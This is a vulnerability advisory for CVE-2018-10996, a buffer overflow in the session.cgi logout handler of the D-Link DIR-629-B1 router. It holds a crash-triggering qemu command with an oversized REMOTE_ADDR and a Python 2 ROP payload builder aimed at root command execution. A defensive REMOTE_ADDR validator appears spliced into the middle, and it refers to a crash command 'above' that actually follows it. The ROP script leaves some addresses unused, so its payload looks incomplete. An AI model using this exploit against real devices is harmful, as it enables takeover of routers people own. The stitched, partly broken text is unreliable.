D-Link DIR-629-B1 CVE-2018-10996 – Code execution

Author: kgsdy                    Risk: High
CVE: CVE-2018-10996              0day: Code execution
0day-id: 0DAY-176173             Date: 2018-05-13

Description

The weblogin_log function in /htdocs/cgibin on D-Link DIR-629-B1 devices allows attackers to execute arbitrary code or cause a denial of service (buffer overflow) via a session.cgi?ACTION=logout request involving a long REMOTE_ADDR environment variable.

Analysis

The vulnerability was found in the “/htdocs/cgibin” binary, in the “weblogin_log” function, which copies input into a stack buffer without a length check.

A user can pass a long value in the ‘REMOTE_ADDR’ environment variable to the ‘/htdocs/cgibin’ binary during a ‘session.cgi?ACTION=logout’ request and cause memory corruption. Furthermore, it is possible to redirect the program's control flow, execute arbitrary code, and write to arbitrary addresses.
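Under the CGI specification REMOTE_ADDR is populated by the front-end web server from the socket's peer address, so the variable should only ever hold a short, well-formed IP address text; the advisory's qemu reproduction sets it directly. The check below is an added example from the defender's side, not code from the advisory or from D-Link: it bounds and parses REMOTE_ADDR before an environment is handed to a CGI binary, and drops an invalid value while recording a finding for logging. The function names (is_valid_remote_addr, harden_cgi_env) and the sample environments are constructed for this illustration; the oversized sample reuses the REMOTE_ADDR string shown in the crash command above.

```python
import ipaddress
from typing import Dict, List, Tuple

# Longest legitimate textual IP address (RFC 4291 forms): a fully written
# IPv6 address with an embedded dotted IPv4 tail is 45 characters.
MAX_ADDR_TEXT_LEN = 45

# Constructed sample: the oversized REMOTE_ADDR shape from the advisory's
# crash command, 60 characters in total.
CRASH_REMOTE_ADDR = "::ffff:Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab"

# Constructed CGI environments, shaped like those a web server builds for
# the logout request named in the advisory.
SAMPLE_ENV_GOOD = {
    "REQUEST_METHOD": "POST",
    "REQUEST_URI": "session.cgi?ACTION=logout",
    "REMOTE_ADDR": "::ffff:192.168.0.10",
}
SAMPLE_ENV_BAD = dict(SAMPLE_ENV_GOOD, REMOTE_ADDR=CRASH_REMOTE_ADDR)


def is_valid_remote_addr(value: str) -> bool:
    """True only for a well-formed IPv4 or IPv6 address in text form.

    The length bound is checked before parsing, so an oversized value is
    refused outright; that bound is exactly what the advisory says the
    weblogin_log copy lacks.
    """
    if not isinstance(value, str) or not value:
        return False
    if len(value) > MAX_ADDR_TEXT_LEN:
        return False
    try:
        ipaddress.ip_address(value)
    except ValueError:
        return False
    return True


def harden_cgi_env(env: Dict[str, str]) -> Tuple[Dict[str, str], List[str]]:
    """Return (cleaned environment, findings) for a CGI invocation.

    An invalid REMOTE_ADDR is dropped rather than forwarded, and a finding
    records the rejection so it can be logged or alerted on; every other
    variable passes through untouched.
    """
    clean = dict(env)
    findings: List[str] = []
    addr = clean.get("REMOTE_ADDR")
    if addr is not None and not is_valid_remote_addr(addr):
        del clean["REMOTE_ADDR"]
        findings.append(
            "REMOTE_ADDR rejected: length %d, not an IP address text form" % len(addr)
        )
    return clean, findings


if __name__ == "__main__":
    for name, env in (("good", SAMPLE_ENV_GOOD), ("bad", SAMPLE_ENV_BAD)):
        cleaned, found = harden_cgi_env(env)
        state = "kept" if "REMOTE_ADDR" in cleaned else "dropped"
        print(name, "REMOTE_ADDR", state, found)
```

The length test runs first on purpose: a single fixed bound rejects any oversized string before the parser touches it, and the parser then rejects the shorter malformed values (non-hex groups, bad dotted tails) that a pure length check would let through.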

Program Segmentation fault:

chroot . ./qemu  -0 "session.cgi" -E REQUEST_METHOD="POST" -E SERVER_PORT="80" -E REQUEST_URI="session.cgi?ACTION=logout" -E HTTP_REFERER="ACTION=123" -E CONTENT_LENGTH=$LEN -E CONTENT_TYPE="application/x-www-form-urlencoded"  -E HTTP_COOKIE="uid=aaaaa" -E REMOTE_ADDR="::ffff:Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab" ./htdocs/cgibin

We have full control over the return address along with a few other registers. A full ROP chain that executes ‘system(“ls”);’ as the root user can be crafted as follows (ASLR was disabled for testing purposes):

#!/usr/bin/env python2
# Python 2 script: str and the output of struct.pack() concatenate directly.

import sys
import struct

libc = 0x76736000  # libc base with ASLR disabled; the addresses below are absolute

ra = struct.pack(">I", 0x7677745C)          # gadget 1 (32-bit big-endian), placed over the return address
godget2 = struct.pack(">I", 0x76777450)     # gadget 2
bufaddr = struct.pack(">I", 0x76FFF7A0)     # buffer address
systemaddr = struct.pack(">I", 0x767872D0)  # system()

REMOTE_ADDR = "::ffff:" + "A"*49 + ra + "B"*4 + bufaddr + "C"*30 + godget2 + "ls"
